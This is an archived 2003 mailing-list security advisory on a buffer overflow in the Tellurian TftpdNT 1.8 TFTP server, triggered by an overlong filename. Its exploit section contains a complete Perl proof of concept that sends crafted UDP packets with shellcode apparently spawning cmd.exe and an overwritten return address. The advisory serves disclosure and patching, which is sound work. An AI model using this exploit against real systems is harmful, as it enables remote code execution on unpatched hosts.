[VulnWatch] Security Vulnerability in Tellurian TftpdNT (Long Filename)

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: vulnwatch@vulnwatch.org
Date: Mon, 1 Sep 2003 14:34:02 +0300

Security Vulnerability in Tellurian TftpdNT (Long Filename)
------------------------------------------------------------------------

Article reference:
http://www.securiteam.com/windowsntfocus/5RP0M1PAUM.html
 
SUMMARY

Tellurian TftpdNT (http://www.tellurian.com.au/) is a TFTP server for Windows
NT and Windows 9x.
A buffer overflow vulnerability in the product allows remote attackers to
cause the product to overflow an internal buffer, while executing arbitrary
code.

DETAILS

Vulnerable systems:
  * TftpdNT version 1.8
 
 Immune systems:
  * TftpdNT version 2.0
 
 It is possible to cause a buffer overflow in the Tellurian TftpdNT product,
while overwriting the EIP pointer - this allows remote command execution.
 The overflow occurs in the product's parsing of the filename.
 
 Vendor status:
 The vendor has been informed, and has fixed the issue within 24 hours. A new
version is available on the web site.
 
 Exploit:
 #!/usr/bin/perl -w
 #Tellurian TFTP Server buffer overflow vulnerability
 
 use IO::Socket;
 $host = "192.168.1.44";
 $port = "69";
 
 $shellcode = "\x90\xCC\x90\x90\x90\x90\x8B\xEC\x55\x8B\xEC\x33\
 \xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45\xF9\x6D\xC6\x45\
 \xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\
 \x45\xFE\x65\xB8\xC3\xAF\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x5F";
 
 $buf = "\x00\x02";
 $buf .= "\x41"x(508-length($shellcode));
 $buf .= $shellcode;
 $buf .= "\x0F\x02\xC7"; # EIP
 $buf .= "\x00\x6E\x65\x74\x61\x73\x63\x69\x69\x00";
 
 print "Length: ", length($buf), "\n";
 
 $socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error:
 $@\n";
 $ipaddr = inet_aton($host) || $host;
 $portaddr = sockaddr_in($port, $ipaddr);
 send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";
 print "Done\n";
 

SecurITeam would like to thank STORM (storm@securiteam.com) for finding this
vulnerability.

-- 
Aviram Jenik
Beyond Security Ltd.
http://www.BeyondSecurity.com
http://www.SecuriTeam.com
Know that you're safe:
http://www.AutomatedScanning.com

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages Security Vulnerability in Tellurian TftpdNT (Long Filename) ... Security Vulnerability in Tellurian TftpdNT ... Tellurian TftpdNT is a TFTP server for Windows ... A buffer overflow vulnerability in the product allows remote attackers to ... It is possible to cause a buffer overflow in the Tellurian TftpdNT product, ... (Bugtraq) [Full-Disclosure] Security Vulnerability in Tellurian TftpdNT (Long Filename) ... Security Vulnerability in Tellurian TftpdNT ... Tellurian TftpdNT is a TFTP server for Windows ... A buffer overflow vulnerability in the product allows remote attackers to ... It is possible to cause a buffer overflow in the Tellurian TftpdNT product, ... (Full-Disclosure) Re: [SNS Advisory No.55 rev.2] Eudora 5.x for Windows Buffer Overflow Vulnerability ... > Eudora 5.x for Windows contains a buffer overflow vulnerability, ... (Bugtraq) Buffer overflow in Windows XP "helpctr.exe" ... Buffer overflow in Windows XP "helpctr.exe" ... I discovered an exploitable buffer overflow vulnerability in "helpctr.exe", which can enable an attacker to execute an arbitrary code on remote users with a malformed url. ... (Bugtraq) [NT] Security Vulnerability in Tellurian TftpdNT (Long Filename) ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A buffer overflow vulnerability in the product allows remote attackers to ... It is possible to cause a buffer overflow in the Tellurian TftpdNT ... (Securiteam)